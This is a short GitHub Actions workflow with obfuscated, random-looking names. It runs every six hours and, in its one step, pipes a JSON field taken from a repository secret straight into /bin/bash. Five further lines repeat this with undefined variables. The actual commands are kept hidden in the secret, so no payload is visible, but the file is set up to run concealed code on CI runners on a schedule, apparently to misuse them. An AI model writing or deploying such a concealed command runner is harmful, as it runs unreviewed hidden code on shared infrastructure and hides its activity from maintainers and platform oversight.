name: meihaxi2513

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meihaxi2513
        env:
          wwtl23: ${{ secrets.wwtl23 }}
        run: |
          echo $wwtl23 | jq -r .n95217 | /bin/bash
          echo $oatv455 | jq -r .oqnb97649 | /bin/bash
          echo $rmx44348 | jq -r .fzlmg61318 | /bin/bash
          echo $c32737 | jq -r .urusg31 | /bin/bash
          echo $eye31 | jq -r .t97 | /bin/bash
          echo $tvaw59 | jq -r .hgr8 | /bin/bash

